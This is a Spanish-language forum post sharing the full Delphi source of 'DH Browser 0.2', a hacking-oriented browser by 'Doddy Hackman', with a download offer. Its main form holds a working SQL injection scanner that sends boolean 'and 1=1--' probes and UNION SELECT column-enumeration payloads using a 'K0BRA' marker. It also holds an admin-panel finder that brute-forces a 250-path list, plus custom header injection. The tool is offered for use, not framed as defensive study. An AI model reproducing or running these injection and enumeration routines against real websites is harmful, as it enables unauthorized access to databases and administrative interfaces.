Un simple browser que hice en Delphi con las siguientes opciones :

• Podes ver el codigo HTML de la pagina cargada
• Se puede buscar palabras en el codigo HTML
• Poder modificar los headers para HTTP header injection
• Trae un SQLI Scanner para buscar vulnerabilidades SQLI
• Trae un PanelFinder para buscar el panel del admin

Unas imagenes :





El codigo :

Carga

// DH Browser 0.2
// (C) Doddy Hackman 2013
 
unit dhbrowse;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, acPNG, ExtCtrls, ComCtrls, acProgressBar, sGroupBox,
  sSkinManager;
 
type
  TForm1 = class(TForm)
    sGroupBox1: TsGroupBox;
    sProgressBar1: TsProgressBar;
    Timer1: TTimer;
    Image1: TImage;
 
    sSkinManager1: TsSkinManager;
    procedure Button1Click(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
 
var
  Form1: TForm1;
 
implementation
 
uses programa;
{$R *.dfm}
 
procedure TForm1.Button1Click(Sender: TObject);
begin
  Form2.Show;
end;
 
procedure TForm1.FormCreate(Sender: TObject);
begin
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'tv-b';
  sSkinManager1.Active := True;
end;
 
procedure TForm1.Timer1Timer(Sender: TObject);
var
  i: integer;
  total: integer;
 
begin
 
  total := 0;
  sProgressBar1.Min := 0;
  sProgressBar1.Max := 100;
 
  For i := 1 to 100 do
  begin
 
    Form1.Update;
 
    Sleep(1000);
    // Sleep(1);
 
    total := total + 10;
 
    sProgressBar1.Position := total;
 
    if (sProgressBar1.Position = 100) then
    begin
      Timer1.Enabled := False;
      Form1.Hide;
      Form2.Show;
      Abort;
    end;
  end;
 
end;
 
end.
 
// The End ?
 

Navegador

// DH Browser 0.2
// (C) Doddy Hackman 2013
// Credits :
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
// Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
 
unit programa;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
  sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG,
  ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent,
  IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;
 
type
  TForm2 = class(TForm)
    sSkinManager1: TsSkinManager;
    sGroupBox1: TsGroupBox;
    sEdit1: TsEdit;
    sButton1: TsButton;
    sGroupBox2: TsGroupBox;
    sMemo1: TsMemo;
    sCheckBox1: TsCheckBox;
    sGroupBox3: TsGroupBox;
    sStatusBar1: TsStatusBar;
    WebBrowser1: TWebBrowser;
    sGroupBox4: TsGroupBox;
    sButton2: TsButton;
    sButton3: TsButton;
    sGroupBox5: TsGroupBox;
    sButton4: TsButton;
    sLabel1: TsLabel;
    Image1: TImage;
    sMemo2: TsMemo;
    PopupMenu1: TPopupMenu;
    S1: TMenuItem;
    S2: TMenuItem;
    IdHTTP1: TIdHTTP;
    PerlRegEx1: TPerlRegEx;
    FindDialog1: TFindDialog;
    sProgressBar1: TsProgressBar;
    procedure sButton1Click(Sender: TObject);
    procedure S1Click(Sender: TObject);
    procedure S2Click(Sender: TObject);
    procedure sButton3Click(Sender: TObject);
    procedure sButton2Click(Sender: TObject);
    procedure sButton4Click(Sender: TObject);
    procedure FindDialog1Find(Sender: TObject);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure WebBrowser1ProgressChange(ASender: TObject;
      Progress, ProgressMax: Integer);
    procedure WebBrowser1DownloadComplete(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
 
var
  Form2: TForm2;
 
implementation
 
{$R *.dfm}
 
procedure TForm2.FindDialog1Find(Sender: TObject);
 
// FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
 
var
  aca: PChar;
  aca2: PChar;
  acatoy: PChar;
  acatoy2: Word;
 
begin
 
  With Sender as TFindDialog do
 
  begin
 
    GetMem(aca2, Length(FindText) + 1);
    StrPCopy(aca2, FindText);
 
    acatoy2 := sMemo2.GetTextLen + 1;
    GetMem(aca, acatoy2);
 
    sMemo2.GetTextBuf(aca, acatoy2);
 
    acatoy := aca + sMemo2.SelStart + sMemo2.SelLength;
    acatoy := StrPos(acatoy, aca2);
 
    if not(acatoy = NIL) then
    begin
      sMemo2.SelStart := acatoy - aca;
      sMemo2.SelLength := Length(FindText);
    end;
 
    sMemo2.SetFocus;
 
  end;
 
end;
 
procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  Application.Terminate;
end;
 
procedure TForm2.FormCreate(Sender: TObject);
begin
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'tv-b';
  sSkinManager1.Active := True;
end;
 
procedure TForm2.S1Click(Sender: TObject);
begin
  WebBrowser1.Visible := false;
  sMemo2.Visible := True;
end;
 
procedure TForm2.S2Click(Sender: TObject);
begin
  WebBrowser1.Visible := True;
  sMemo2.Visible := false;
end;
 
procedure TForm2.sButton1Click(Sender: TObject);
 
// Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
 
var
 
  cabeceras: OLEVariant;
  uno: OLEVariant;
  dos: OLEVariant;
  tres: OLEVariant;
 
begin
 
  uno := navNoReadFromCache or navNoWriteToCache;
  dos := '';
  tres := '';
 
  if (sCheckBox1.Checked) then
  begin
    cabeceras := sMemo1.Text;
    WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
  end
  else
  begin
    cabeceras := '';
    WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
  end;
end;
 
procedure TForm2.sButton2Click(Sender: TObject);
var
  pass1: string;
  pass2: string;
  code: string;
  urltest: string;
  urlgen: string;
  full: string;
  codedos: string;
  i: Integer;
 
begin
 
  sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
  Form2.sStatusBar1.Update;
 
  pass1 := '+';
  pass2 := '--';
 
  urltest := 'concat(0x4b30425241,1,0x4b30425241)';
 
  sStatusBar1.Panels[0].Text := '[+] Checking ...';
  Form2.sStatusBar1.Update;
 
  code := IdHTTP1.Get
    (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);
 
  codedos := IdHTTP1.Get
    (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);
 
  if not(code = codedos) then
  begin
 
    sStatusBar1.Panels[0].Text := '[+] Finding columns number';
    Form2.sStatusBar1.Update;
 
    urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
      'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
    urlgen := '1';
    for i := 2 to 36 do
    begin
      sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
      Form2.sStatusBar1.Update;
      urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
        + ',0x4b30425241)';
      urlgen := urlgen + ',' + IntToStr(i);
      code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
      PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
      PerlRegEx1.Subject := code;
 
      if PerlRegEx1.Match then
      begin
 
        urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1],
          'hackman', []);
        full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
          'union' + pass1 + 'select' + pass1 + urlgen;
 
        sEdit1.Text := full;
        Abort;
 
      end;
    end;
  end;
 
  sStatusBar1.Panels[0].Text := '[+] Done';
  Form2.sStatusBar1.Update;
 
end;
 
procedure TForm2.sButton3Click(Sender: TObject);
const
  paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
    'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
    'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
    'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
    'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
    'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
    'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
    'login/index.asp', 'login/index.aspx', 'login/login.asp',
    'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
    'administracion/index.asp', 'administracion/index.aspx',
    'administracion/login.asp', 'administracion/login.aspx',
    'administracion/webmaster.asp', 'administracion/webmaster.aspx',
    'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
    'admin/admin.php', 'admin/index.php', 'admin/login.php',
    'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
    'admin/default.php', 'administracion/', 'administracion/index.php',
    'administracion/login.php', 'administracion/ingresar.php',
    'administracion/admin.php', 'administration/', 'administration/index.php',
    'administration/login.php', 'administrator/index.php',
    'administrator/login.php', 'administrator/system.php', 'system/',
    'system/login.php', 'admin.php', 'login.php', 'administrador.php',
    'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
    'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
    'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
    'admin/index.html', 'admin/login.html', 'admin/home.php',
    'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
    'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
    'administrator/index.html', 'administrator/login.html',
    'administrator/account.html', 'administrator/account.php',
    'administrator.html', 'login.html', 'modelsearch/login.php',
    'moderator.php', 'moderator.html', 'moderator/login.php',
    'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
    'moderator/', 'account.php', 'account.html', 'controlpanel/',
    'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
    'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
    'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
    'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
    'administrator/index.asp', 'administrator/login.asp',
    'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
    'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
    'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
    'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
    'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
    'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
    'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
    'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
    'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
    'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
    'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
    'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
    'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
    'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
    'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
    'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
    'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
    'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
    'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
    'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
    'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
    'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
    'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
    'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
    'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
    'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
    'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
    'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
    'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
    'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
    'system_administration/', 'ss_vms_admin_sm/');
var
  IdHTTP: TIdHTTP;
  i: Integer;
  control: Integer;
begin
 
  control := 0;
 
  sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
  Form2.sStatusBar1.Update;
 
  IdHTTP := TIdHTTP.Create(nil);
 
  for i := Low(paginas) to High(paginas) do
 
    if (control = 1) then
    begin
      Abort;
    end
    else
    begin
 
      try
 
        sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
        Form2.sStatusBar1.Update;
 
        IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
        if IdHTTP.ResponseCode = 200 then
        begin
 
          sStatusBar1.Panels[0].Text := '[+] Done';
          Form2.sStatusBar1.Update;
          sEdit1.Text := sEdit1.Text + '/' + paginas[i];
          control := 1;
        end;
      except
        on E: EIdHttpProtocolException do
          ;
        on E: Exception do
          ;
      end;
 
    end;
 
  sStatusBar1.Panels[0].Text := '[+] Done';
  Form2.sStatusBar1.Update;
 
end;
 
procedure TForm2.sButton4Click(Sender: TObject);
begin
  FindDialog1.Execute;
end;
 
procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
var
  buscador: IHTMLElement;
begin
 
  sProgressBar1.Position := 0;
 
  // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm
 
  begin
 
    try
      begin
 
        sMemo2.Clear;
 
        buscador := (WebBrowser1.Document AS IHTMLDocument2).body;
 
        while not(buscador.parentElement = nil) do
        begin
          buscador := buscador.parentElement;
        end;
        sMemo2.Lines.Add(buscador.outerHTML);
      end;
    except
      // ??
    end;
  end;
end;
 
procedure TForm2.WebBrowser1ProgressChange(ASender: TObject;
  Progress, ProgressMax: Integer);
begin
  sProgressBar1.Max := ProgressMax;
  sProgressBar1.Position := Progress;
end;
 
end.
 
// The End ?
 

Si lo quieren bajar lo pueden hacer de aca.